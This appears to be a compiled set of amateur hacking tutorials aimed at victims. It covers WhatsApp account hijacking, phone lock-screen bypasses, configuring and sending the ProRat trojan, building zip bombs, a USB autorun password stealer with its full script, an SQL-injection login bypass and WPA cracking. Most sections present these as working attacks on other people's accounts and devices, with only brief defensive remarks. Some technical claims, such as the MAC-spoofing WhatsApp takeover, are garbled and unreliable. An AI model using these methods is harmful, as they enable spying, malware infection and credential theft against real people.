Hack WhatsApp Account

Introduction: Though I am pretty sure most of you might be knowing about whatsapp but still here is a brief into about the same.

Whatsapp Messenger is a cross platform quick messaging application. Whatsapp is assured really the foremost fashionable quick electronic messaging for smartphones. Whatsapp Messenger is accessible for iPhone, Android, Windows Phone, Blackberry and Nokia and yes, those phones can all message each other. And you all have heard of it if you are not using it. Given below are the several whatsapp hacks or tricks you should know if you are using whatsapp.

Steps:

All you need is to get access to victim phone to get the victims phone “MAC address along with the verifying massage” which is acquired to verify your device.

• Get mac address on your android phone.
• Finding MAC address on an Android Phone
• On your phone’s home screen, click on menu, then go to setting.
• Click on about phone.
• Click on the status.
• And then view your Wi-Fi MAC address.
• As soon the message is received Push the MAC address as well as Verifying code to your server or mail it your ID. That banks on your convince.
• Cheat your phone’s MAC address to the Victims address and install whatsapp and after that type the verify code.
• And now its done. You get full access to the victim’s whatsapp ID. So now you can keep spying/watching your victim’s movements.
• That means you and the victim is using the same ID from different devices.
• Whatsapp hack to use it by not using your number
• This hack works by cheating the Whatsapp Verification Servers by sending a spoofed request for an authorisation code expected for a different phone.
• Install Whatsapp on your device. Whatsapp now opens a counter where it sends a verification message to its servers.
• Block the message service – it can be blocked by changing the message centre number or turning the phone into Airplane mode.
• Whatsapp now gives a substitute method of verification – Select verify through SMS and fill in your email address. Once you click to send the SMS press cancel to abort the call for authorisation to the Whatsapp server.
• Now you have to do sms Spoofing.
• Examine your outbox and copy the message details into the spoofed application and send the spoofed verification.
• You will now receive messages expected for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Bypassing/Hacking Android Devices (Factory reset)

Introduction: This is the last step you do if you want to bypass an Android Device still it is useful but all the data on the device will be erased totally , it is possible to recover some of it through different tools. Here are the steps to factory data reset and bypass any android phone/device.

Steps:

• Press and hold the correct keys to boot the device into recovery mode. This will vary from device to device. Here are some examples:
• Nexus 7: Volume Up + Volume Down + Power
• Samsung Galaxy S3: Volume Up + Home + Power
• Motorola Droid X: Home + Power
• Devices With Camera Buttons: Volume Up + Camera
• Similar devices will likely use similar key combinations. For example, the Nexus 4 also uses Volume Up + Volume Down + Power.
• If your device isn’t on this list and none of the above methods work, do a Google search for the name of your device and “recovery mode” – or look in the device’s manual or support pages.
• Release the buttons when the device powered on. You’ll see an image of an Android lying on its back with its chest open and its internals revealed.
• Press the Volume Up and Volume Down keys to scroll through the options until you see Recovery mode on the screen.
• Press the Power button to restart into recovery mode. You’ll soon see an Android with a red triangle.
• Hold down the Power button and tap Volume Up. You’ll see the Android system recovery menu appear at the top of your screen.
• Select wipe data / factory reset with the volume keys and tap the Power button to activate it.
• Select Yes – erase all user data with the volume buttons and tap Power. Your device will be reset to its factory state and all your data will be erased. 

  Note: If your device freezes at any point, hold down the Power button until it restarts.

Bypassing/Hacking Apple Device IOS 6.1.2

Introduction: This vulnerability allows users to bypass the lock screen pass code and access the phones photos and contacts. Researchers say the vulnerable device can be plugged into a computer via USB and access data like voice mails, pictures, contacts, etc.

Steps:

• Connect the device with itunes and the appstore to make sure the code lock is activated.
• Push the power button (top|right)
  The mobile will be activated and the iOS code lock will be visible
• Now, you click on the emergency call
• Try to dail any random emergency call number from a public listing (we used 911, 110 and 112)
• Call the number and cancel the call directly after the dail without a direct connection to the number
• Push again the power button and push after it the iphone button (square) in the middle
• In the next step you push the power button 3 secounds and in the third secound you push also with one finger the square and with another the emergency call button
• After pushing all 3 buttons you turn your finger of the square (middle) button and after it of the power button
• The display of the iOS will be black (black screen)
• Take our your usb plug and connect it with the iOS device in black screen mode
• All files like photos, contacts and co. will be available directly from the device harddrive without the pin to access.

Bypassing/Hacking Samsung Galaxy Note 2 & S3

Introduction: This is tutorial showing that how to hack or bypass a Samsung Galaxy Note 2 or S3, this is really simple and a bug was discovered, it may not work at first as it need some practice to do it correctly so just try and try, I think you will succeed in almost 20 attempts.

Steps:

• Lock the device with a “secure” pattern, PIN, or password.
• Activate the screen.
• Press “Emergency Call”.
• Press the “ICE” button on the bottom left.
• Hold down the physical home key for a few seconds and then release.
• The phone’s home screen will be displayed – briefly.
• While the home screen is displayed, click on an app or a widget.
• The app or widget will launch.
• If the widget is “direct dial” the phone will start ringing.

Bypass Android Device Lockscreen

Introduction: The lockscreen is one of the cornerstones of security on Android. It keeps nosy people at bay, it avoids ill-intentions and serves as a barrier of entry to possible thieves. However, sometimes it manages to keep even you at bay – it’s very easy to forget your lockscreen PIN, or to mess up the pattern unlock. So, what can you do once that happens, and you’re locked out of your own device? Well, come with us as we take a look at some of the methods you can use to bypass or even hack yours our maybe someone else’s lockscreen completely!

Android Device Manager:

This is by far the easiest and most direct method of bypassing the lockscreen, since it’s supported by Google and doesn’t really have any special requirements. It should work for most users, and is very simple to do. All you need is Android Device Manager enabled beforehand, which is something Google automatically does for you anyway in most modern devices, and a data connection.

Steps:

• Go to https://www.google.com/android/devicemanager?hl=en&u=0 and enter your Google account password
• You’ll see the Device Manager dashboard. It will attempt to locate your device on the map, which if you have GPS and a data connection enabled, it should be able to do.
• Press the “Lock” button. It will show you a screen where you are able to replace your current lockscreen PIN number with a new one, set by you.
• Enter the new PIN and select “Lock”. Your device should automatically lock.
• Unlock your device by entering the new PIN number you just set. After unlocking, feel free to go to Settings and set a new one.

Like I said, this is the most straightforward solution, but it does require a data connection, which is something that won’t be there for everyone, for example, because you are not able to turn on Wi-Fi or mobile data after unlock. In that case, I have a few more solutions enlisted bellow

Note: This methoidbonly works for your personal device or a device containing your Google or Samsung account.

USB Debugging:

In case you have USB Debugging enabled (for those that aren’t aware, this option can be found in the Settings, under Developer options), there’s a lot you can do to try and hack the lockscreen to bypass it completely. For this, you’ll need to setup and install ADB, which stands for Android Debug Bridge. This is a feature meant for developers and allows them to directly interact and send commands to the device in order to get accurate and direct data in real time. However, we can use it to send our own commands and try to get rid of the lockscreen completely.

Steps:

• Install and set up ADB. This varies from manufacturer to manufacturer, and even within devices, so you’ll need to find a tutorial for your specific device. However, there are a few easier methods depending on your OS, like the 15 Second ADB Installer for Windows that is more or less universal and easy to set up.
• Open an ADB session. This is done by connecting your device to the computer over USB, opening a command prompt or terminal on your OS, and typing “adb devices”. You should get a code in return that identifies your device, meaning that ADB is working correctly and is able to see your device. If you get an error, you don’t have USB Debugging enabled or ADB set up properly (for example, you may need to navigate to a certain folder and open the command prompt from there – look for solutions for your case)
• Enter the following commands:

adb shell
cd data/system
su
rm *.key

• These commands will directly send a request to the device asking to delete all the .key files in the data/system directory and subdirectories, which is where lockscreen system data is stored.
• Reboot the device, and the lockscreen should be gone. If you still get a lockscreen, enter any code and it should unlock.

 Note: If the above solution didn’t work for you, try these commands instead (make sure you start a new ADB session!):

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit

•  Again, reboot and enter any code to get rid of the lockscreen. If that one didn’t work either, you can try this one as a last resort:

adb shell rm /data/system/gesture.key

• Again, reboot and see if it worked. If none of these commands worked thus far, there’s not much else you can do using this method alone, so you’ll have to try a new one given bellow:

Root and a Custom Recovery:

In case your device is rooted and you have a custom recovery installed, you can flash a file directly to the device that will delete the .key file storing the PIN directly using a script. In order to do this:

• Download this file: https://mega.co.nz/#!NVtyWQDA!7qy58ihYMY07ehADl2tDUIzK4bF0XzO_xh7k-JWj_aY
• Copy the file over to the device. If your device uses an SD Card, copy it there. Otherwise, you can use ADB with the “push” command in order to send the file to a folder on your device. Look for instructions if you’re unsure about how to do this.
• Boot into the recovery. Each device has it’s own method to do this, so look it up (generally it’s a combination of volume and power buttons after reboot).
• Flash the file.
• Reboot the device. The lockscreen should be gone, or able to accept any code.

If all of these didn’t work I will post some more in some time.

Trojan Horse (Using)

Introduction: This tutorial is about configuring and using a Trojan. There are many Trojans available on internet for free. Some popular ones are Beast, Pro Rat, Netbus , Back Orifice, Girlfriend, Sub 7. I will be using Pro Rat in this tutorial.

Requirements:

1. Prorat- Click here to download Trojan Prorat.
2. Hostname  –  Your IP address would probably be dynamic that it keeps changing every time you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:

• Log On to http://www.no-ip.com and register for an account.
•  Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.
•  Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.

Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type ‘ping yourhostname’ (without quotes) , hopefully it should reply with your IP address.

Tutorial for configuring Trojan: 

• Open prorat.exe that you have downloaded.
• Click on Create  and then Create ProRat Server.
• Enter your host name in the ProRat Notification field as shown. Uncheck all other options.
• Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.
• Finally click on create  server and now its ready to be sent to victim.  Once victim installs it, it would automatically disable antivirus/firewall.

Modes of sending: 
You must be thinking of sending this server.exe to victim through an email as an attachment but unfortunately you can’t do so. The good option is  to upload it on any uploading site like mediafire.com and give downloading link to victim or you can transfer it by some pendrive(USB) or CD/DVD.

What after victim has run the server part ?

• Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
• You will start listening to connections, I mean you will get a notification as shown when victim would be online.

Note: If you know victim is online and still its not listening to any connections. Trace victim’s IP,enter in IP field and hit connect. But its gonna work only if he is not behind any network and directly connected to internet. If you don’t know how to trace IP, click over HERE.

What after successful connection ?

After you have managed to connect to victim’s machine. There are numberless interesting things to do. I leave this part on you.  Have Fun.

How to make it undetectable from antivirus ?
Though there isn’t any hard and fast way to make it fully undetectable from all antivirus. The real way to do it is modify the source code of open source trojans available. Its very challenging job. There are many crypters which claim to make it undetectable but unfortunately hardly one out every hundred works. I would try to write some article on disabling anti virus.
countermeasure against Trojans –
The obvious countermeasure against Trojans is that do not accept downloading links blindly. Keep your antivirus up to date.

Detecting and removing Trojan –
Though trojan once installed is very hard to remove . It would hide itself from the Task Manager .Install Process Explorer and it would hopefully show you all process running including trojan. Kill the process and remove it. One good thing is to carefully check the open ports and services running through ‘netstat’ command. Anyways , the best option is to reinstall the windows.

Trojan Horse (Intoduction)

Introduction:

A Trojan horse is a remote administration tool(RAT). This is some thing extremely dangerous.  A Trojan gives the full control of victim’s PC to the attacker. 

 A Trojan has two parts . One is client part (Control Panel) and other is server part (meant to be sent to victim).

The basic methodology of using a trojan is as follows:-

• Attacker creates an executable file of size in kbs. This  is  server part of trojan and mostly called as server.exe
• Attacker might hide this server.exe behind any genuine file like a song or image. Attacker gives this file to victim and victim is supposed to double click on it.
• As victim run that server part , a port on victim’s computer gets opened and attacker can control his PC sitting remotely in any part of the world through the control panel(client part). Attacker can do anything with victim’s computer remotely that victim himself can do on his computer.

Note: Now I am assuming that you know a little bit about IP addresses that is lan/internal/private and wan/external/public IP.

Two different methods of working of Trojan.

•  Direct Connection : In this method, after the server part has been installed on victim’s machine, the attacker enters the public IP address assigned to victim’s computer for making a connection to it. But limitations of direct connection is that public IP address is most probably dynamic and gets changed everytime one disconnects and reconnects. So attacker needs to find out IP address of victim each time.Moreover the incoming connection like this is usually restricted by firewall.

The main limitation of direct connection is that you can not access the victim who is behind a router or a network beacuse victim’s machine is not assigned public/external/wan IP. It is only assigned private/internal/lan IP which is useless or meaningless for computers outside that network.The wan IP belongs to his router.

 

It doesnt matter how attacker is connected to internet. Attacker can be connected to internet any of three means.

2. Reverse Connection: In this method, attacker enters his own IP address in server part while configuring it .So when the server part is installed on victim’s computer, it automatically makes connection with client part that is attacker. Also the firewall in victim’s machine would not restrict to outgoing connections. Problem in this case is same that attacker’s IP is also dynamic. But this can be over come easily. Attacker actually enters a domain name in server part which always points to his dynamic IP.

So you just learned what a Trojan really is click HERE to visit the page on how to use Trojan.

Zip Bomb

Introduction: A zip bomb, also known as a decompression bomb (or the ‘Zip of Death’ for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software, in order to create an opening for more traditional viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory.

The classic zip bomb is a tiny zip file, most are measured in kilobytes. However, when this file is unzipped its contents are more than what the system can handle (usually up to Petabyte, i.e 1000 Terabyte. Some go up to exabyte too). Yes, we’re talking about stuffing exabyte of data into kilobytes. In my view, this ingenious little trick is the product of “pure hacker mentality”. In essence, it’s nothing like phishing or sessio hijacking or anything else that has put a bad name to “hackers”. It’s a simple creative solution, an exploited loophole which truly shows: “Where there’s a will, there’s a way”. To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR etc.)

Various compression software and tools make use of what’s called “Lossless compression algorithms”. As the name suggests, these algorithms strive to compress files without any loss of information. Clearly, when we compress a file we’d definitely want to get it back in the same shape after decompressing. These algorithms usually exploit statistical redundancy in such a way as to represent the sender’s data more concisely without error. In English now: We know that the computer only understands 0’s and 1’s, So every single program or any data stored in your computer is actually just a series of 1’s and 0’s (Binary form). Let’s take an example that’s not entirely correct but will help you understand the principle. Say, we’ve got a file which after being converted to binary language looks like “1110000101”. Remember statistical redundancy that was mentioned earlier? Try to spot it in this string (1110000101). Statistical redundancy basically means that the same thing is repeated over and over again. In this string we see that there are three 1’s followed by four 0’s. Now take a look at this string: “3140101”. What just happened here is compression. We can simply write a program that codes and decodes files as above (Softwares like WinZip use a fancy form and overly complicated form of what we did above). If the program finds repeating patterns, like a lot of 1’s together, it may simply replace all those 1’s by another number. Another example, we find “111111111” somewhere in a program. That’s nine 1’s in a row. What if we replace it by “91”? We can simply code our program to replace a “91” by writing “1” nine times, effectively reversing the process. Again, while decoding, if the program encounters any number other than 1 or 0, in our case 9, it can be instructed to write the successive number, in our case 1, 9 times. So “91” gets converted back to “111111111”. That’s lossless compression.

What about the previous string (3140101)? On decompressing this, we get back 1110000101, that is, the original string. Like I said, this example is not entirely accurate. Note that the computer only understands binary. Everything that you’ll ever do on a computer will have, at some point, been converted to binary form. Actually the computer is forced to convert to something other than binary (like english) only for us, dumb humans. We compressed “111111111” by writing “91”. But the “9” in the “91” will also have to again be converted into 1’s and 0’s. So our program is quite buggy. Widely used programs like WinZip, WinRar, PowerISO etc. use various different algorithms for different cases.

Lossless compression is possible because most real-world data has statistical redundancy. Lossless compression schemes are reversible so that the original data can be reconstructed.
However, lossless data compression algorithms will always fail to compress some files. Indeed, any compression algorithm will necessarily fail to compress any data containing no discernible patterns. Attempts to compress data that has been compressed already may actually result in an expansion, as will attempts to compress all but the most trivially encrypted data. This is why if you’ve ever tried “ZIPing” or “RARing” a file, you would have noticed in some cases it works great while in other cases it may not even reduce the file size by 5%. (WinRAR and WinZIP can be considered the same for (almost) all practical purposes. Their names differ more than their compression abilities. Feel free to use either.)

Now, back to zip bombs. Before taking a deeper look, let’s get the basic meaning cleared up. Take a new text file and write ‘0’ a 1000 times. Save it, the file size should be just around 1 kilobyte. Open it up, CTRL+A, CTRL+C,CTRL+V – i.e, copy the whole thing then paste it. Do this ten times. Our file is now around 10kb, and completely made of 0’s. Do this a few more times. Faster than your expectations, the file size will quickly climb into megabytes and then gigabytes. In most cases, the notepad (or any text editor) will actually begin to lag since it has a ridiculous amount of 0’s open in the window. When that happens, that’s your cue to slow down since different operating systems and softwares can have unexpected behavious when dealing with such large files. Practically, just keep it under a few gigabytes and you should be fine.
(Even this may be too much for some systems, I recommend pausing at about a 100 Mb and then slowly increasing the size. If the lag lasts longer than around 15 seconds, you’ve reached the limit.) So, we have a 5Gb text file (on an awesome computer) containing nothing but 0’s. A little perspective: That’s over five-freaking-billion zeros that the innocent little notepad obediently handled in a few seconds. So the next time you’re getting annoyed at your browser lagging a little bit, try taking a notebook and write down 5Gb worth of text. It’s only fair.

And we’re back. What do we do now with that ridiculously large text file? Compress it and watch your seriously underappreciated computer do magic. In the same directory, you’ll now see the pointlessly large text file, and alongside it, a zip file that should be under 1 Megabyte. That’s like stuffing 5000 balls into the volume of one.

Now, for a deeper look let’s check out the most famous zip bomb, the 42.zip file. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level – effectively converting their exponential growth to linear.

(Here’s a small website dedicated solely to the 42.zip, http://www.unforgettable.dk/ . You can ven download a ready-made zip bomb from here. Password for the zip file is ’42’. The file has a password to protect users who have ancient antivirus software that is set to automatically scan all downloads)

Now, to avoid giving the wrong impression a myth needs to be busted. “Zip Bomb” is not a very accurate name for this malicious file. If you extract a zip-bomb, it won’t do anything to your computer though, it’ll just create 16 smaller zip-bombs. If you decompress one of those it’ll yield 16 more zip-bombs. As such, they’re not going to “explode” when someone opens them, they’re just used by malware authors to knock out anti-virus software so malware can work without needing to watch its back. What happens is, a malicious program may plant a zip bomb somewhere near it as bait for AV software. The program will wait until the anti-virus comes up for a routine scan, and it’ll wait, “hiding” behind the zip-bomb. When the anti-virus reaches the bomb, it’ll try to open it, all in its limited memory. 1 file becomes 16, which becomes 256, and it goes on until the memory is full. In reality though, the computer never runs out of memory because each process is only allowed to use so much memory, after it hits its limit it crashes itself to protect the rest of the computer from an OOM (Out-Of-Memory) event. When this happens to an anti-virus program as it’s trying to dig into the file for malware, the software simply crashes and exits, while leaving the rest of the computer unharmed. The malware will detect this, and will then use that opportunity to do whatever it wants, without having to worry about AV software that might be right around the corner. Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these “bombs”) to be smart and refuse to unpack archives that are “too large”, because until the last level the total amount of data is not “that much”, you don’t “see” how large the files at the lowest level are until you have reached that level, by which time it is, of course, too late). However, most anti-virus software today recognizes a zip-bomb when it sees one, and will skip over it, alerting the user that the computer might be infected with malware. They usually go down to the second or third level before flagging the file.

Further, You wouldn’t notice disk space being used because zip-bombs only decompress in an anti-virus program’s memory, not to the disk. Most manual archive-opening programs don’t even have a recursive opening mode for this very reason. Plus you also wouldn’t notice much extra work by the CPU, because zip-bombs work so fast they can knock out an inadequately protected anti-virus program in seconds, while only using a fraction of the total computer’s memory.

The 42.zip is just one example, there are many more like this and you can create your own. A similar file is an XML-based decompression bomb called “billion laughs” (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory (Again, most browsers today will detect such recursive expansion and simply not try to parse the booby-trapped XML).

There’s even a torrent for one of the largest (and smallest) zip bombs on the internet although it seems all the seeders have long gone. It’s a 5.61 kilobyte zip file that expands to 4 zettabyte. It seems to be at the absolute limit of zip bombs. Here’s the KickAss Torrent link:

http://kickass.to/zip-bomb-insanely-huge-zip-archive-4zb-t2105770.html

(As a challenge, you can try replicating it. The file structure has been explained in the link: 8 layers, 32 archives in each layer, each archive containing a 4Gb file)

Let’s walk through the process once again. Make a 4 Gb text file full of 0’s. Zip it. Let’s call it zip1. Create, say 10 copies of this zip file. We have 10 zip1’s. Now, zip all ten zip1’s again. Call it zip2. We’re at the second level now and we can simply continue the process for as long as we like and the zip file will just keep getting bigger and bigger. A common doubt is, How can we create a zip file that opens up to a 4 Zettabyte size without having 4 Zettabyte memory on our computers? Actually, we don’t even need 10 Gb for this. We just took a 4Gb text file and zipped it (into zip1). We can simply delete the original text file as it is no longer required. All we need is the first single tiny zip file and it is of this zip file that we create more copies, zip them up, create more copies and zip again and so on.

And that ends the story of the zip bomb. These actually come under the class of logic bombs, which also contains the fork bomb we made using batch files. Yet again, the name DDOS is going to pop up here. Zip bombs are basically DDOSers for antiviruses. Limited memory is a ‘flaw’ that has remained in all computers since their inception and hackers always find a way to exploit it. When the old methods stop working, new ones soon pop up and take their place. DDOSing, Zip Bombs, Fork Bombs, XML bombs, PDF bombs, buffer overflows and what not. This shows what a crucial part of programming ‘memory management’ really is. And so, we live another day, ready to combat the next problem

Password Stealer / USB Stealer

Introduction: There’s a lot of people in the world and even more online accounts. Every security system has a flaw and what we’re going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick “Remember Me” on various websites without a second thought thinking it’s going to save their time. This is particularly common among people who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to “recover” saved passwords (More like to exploit exactly these naive people). Browsers store passwords and account details in cookies. What’s quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to “Show Saved Passwords” in the options menu. We’re going to cut even that out, just plug-in a USB Take it out and Voila! we have all the passwords. That is what you’ll learn in this tutorial. So, with a goal in mind and not a second to spare, let’s start right away.

Things you will need (See link below):-

MessenPass – MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview – IE passview is another small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I’ve tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)

So that’s that and now we are ready to create a USB password stealer.
Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course .

•  First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any])
• Create a new Notepad and write the following text into it:

[autorun] open=launch.bat
ACTION= Perform a Virus Scan

• Save the Notepad and rename it from New Text Document.txt to autorun.inf
• Now copy the autorun.inf file onto your USB pendrive.
• Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.)

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

• Save the Notepad and rename it from New Text Document.txt to launch.bat
• Copy the launch.bat file also to your USB drive.

These were simple commands to start-up our password “recovering” programs as soon as we plug-in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.

Now your USB password stealer is ready. All you have to do is insert it in your victim’s computer and a pop up will appear, in the pop-up window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work.
See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.
This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.

Hacking Games / Cheat Engine

Introduction: Here’s a seemingly a typical tutorial on hacking games, games are hacked and cracked by a software called Cheat engine. Cheat Engine is an open source tool designed to help you to modify (mostly) single player games so the user can make them harder or easier depending on their preference. (Example: If you find that 100 HP is too easy on a particular game, you can try playing a game with a maximum 10 HP as a challenge). Cheat Engine(CE) also contains several other useful tools to help debugging and really just messing around with games and pretty much any applications.(Example: As a prank, one may alter the download speed shown in a torrent client/download manager to perhaps 100Gbps or something like that.)

CE also comes with a memory scanner to quickly scan for variables used within a game and allow you to change them, but it also comes with a debugger, dis assembler, assembler, speedhack, trainer maker, direct 3D manipulation tools, system inspection tools etc. – The ultimate tool for a mischievous programmer. So, read on to find out how CE does it.

Although CE can do quite a bit more, let’s take a look at an example of “hacking” a game. Now, every single application there is uses what’s called “variables” to store various values. In a game, for example, the player’s HP, level, ammo, position – literally everything is stored in certain variables. There could be a separate variable with values 0-100 keeping track of hit points (HP), another variable keeping track of what level the user is currently in, and perhaps three more keeping track of the X,Y,Z coordinates of the avatar or player in a 3-D game. Almost all new games these days run in cycles. What I mean by that is the game has a recurring infinite loop of some function (group of statements) that goes on and on until the player exits/pauses the game. Inside the loop, the function’s code checks to see if (example) any user event has occurred. Did the user press the arrow keys? If so, then update their position accordingly. Did s/he click the left mouse button? If so, then decrease ammo by one and call the function to launch a projectile from the gun and so on. Certain aspects of games often rely completely on a particular variable and trust it to maintain a legit value. Considering that the average user may never even know about the existence of these background variables, it’s a reasonably safe bet. It’s just a game after all and implementing double checks, encrypted values and a sealed environment (sandbox) is simply not worth spoiling the performance and gameplay. This small point is what leaves almost every single player game vulnerable to nosy software such as Cheat Engine.

This is also the reason why CE does not (yet) work for most big online games likes RuneScape, WoW, AoC etc. since the data and any changes done to it are always double checked with the server’s copy. Whatever happens at the server, stays at the server and although you could make yourself LOOK like a pro, that will be only because of your dumb browser. (I.e., Like all applications, your browser also maintains variables which can be tampered with, but that doesn’t affect the server’s copy)

What CE does is trying to find out which variables the application is using, the addresses at which they are stored in the RAM and possibly tamper with them according to what the user(you) may want. For gamers, this tool is simply god sent. You can increase your speed in “Need for speed”, get infinite ammo in “Call of Duty” and avoid killing a thousand people or typing cheat codes for money in “Grand theft Auto” and so much more.

Unwinding back, how does any of this relate to hacking? It all lies in experience. CE teaches you how to find out exactly what the problem is and how to solve it. The procedure for tampering with games is very close to what we will try to accomplish in later, more advanced hacking techniques. CE gives you the feel and thrill of cracking a seemingly impossible problem and teaches you how to look for an open window when the door is locked – which is actually a very accurate definition of hacking. CE gives you a hint, a glimpse of advanced hacking procedures to which we shall get to later on. Fair warning, in my experience I’ve noticed that the number one reason for beginners giving up early while learning hacking is simply because it just gets a little boring. Outside of movies, that’s just the way it is. But for those willing to make the journey, the reward is more than worth it. I admit that to truly enjoy using CE, you have to be somewhat of a gamer. Hacking depends on, more than anything else, practice because practice only can give you the experience needed to truly hack like what you see in movies. (Yes, it’s possible. Everything is..) CE is nowhere close to a professional hacking tool, but it’s a step in the right direction (plus it’s fun). For the programmers, as I mentioned before CE is open source – It’s all out there waiting for you to explore. (Check out the official website given below)

This was more of an introduction than a tutorial and that’s because CE comes packed up with it’s own excellent tutorial for it’s usage. For beginners I recommend going through the tutorial(The one that comes with CE). As easy as I’ve made it sound, head over to the following website to download CE and see for yourself.

http://www.cheatengine.org/

Hacking Website (Basic HTML Coding)

Introduction: If you have basic HTML and JavaScript knowledge, you may be able to access password protected websites. This article will give you an easy method to hack simple, less-secured websites of your choice simply through HTML. Use it responsibly.Unfortunately Websites with robust security details will not be susceptible to this kind of simple attack.

Steps:

• Open the site you want to hack.
• Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ‘ or 1=1 –)
• An error will occur saying wrong username-password. Now be prepared your experiment starts from here.
• Right click anywhere on that error page =>> go to view source.
• In View the source code. There you can see the HTML coding with JavaScript.
•  There you find something like this….<_form action=”…Login….”>
• Before this login information copy the URL of the site in which you are. (e.g. :”< _form……….action=http://www.targetwebsite.com/login…….>”)
• Delete the JavaScript from the above that validates your information in the server. Do this very carefully.—Your success in hacking the site depends upon how efficiently you delete the java script code that validates your account information.
• Take a close look for “<_input name=”password” type=”password”>”[without quotes] -> replace “<_type=password>” with “<_type=text>”.
• See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write ).
• Go to file => save as and save it anywhere in your hard disk with ext.html (e.g.: c:\chan.html).
• Reopen your target web page by double clicking ‘chan.html’ file that you saved in your hard disk earlier.
•  You see that some changes in current page as compared to original One. Don’t worry.
• Provide any username [e.g.: hacker] and password [e.g.:’ or 1=1 –] You have successfully cracked the above website and entered into the account of List user saved in the server’s database.

(We are Done and you will be able to enter the website)

Hacking WPA/WPA2

Introduction: WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, it’s simply uncrackable (yet). But most Networks do use PSK only, so your chances are good. Before continuing on just take a look at what type of protection the network has.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. This is because in this Hack our only option is to use a Dictionary attack, that means literally test each and every word in a text file and checking whether it is the password. A simple google : “Dictionary attack list” will give you a text file containing all the known words, Pick the one that’s the biggest.

There is another important difference between cracking WPA/WPA2 and WEP which is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs(more packets) like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network and attempts to authorize. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack if the password is set to anything unusual, since even an 8 character password is almost impossible to brute-force.

This means that the pass phrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

Also, there is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

There’s pretty much no steps in this tutorial. All you need is the .cap file and a dictionary list:

• Check out the WEP cracking tutorial, complete till step 10. Then you’ll have your .cap file which contains information about handshakes that aircrack uses to crack the key.
• After you get the .cap file open up Aircrack -ng, just on the first screen find and select your .cap file, select WPA Encryption option and find and select your dictionary list. If the password is in the dictionary list, you’ll see the magic happen and the key will appear.
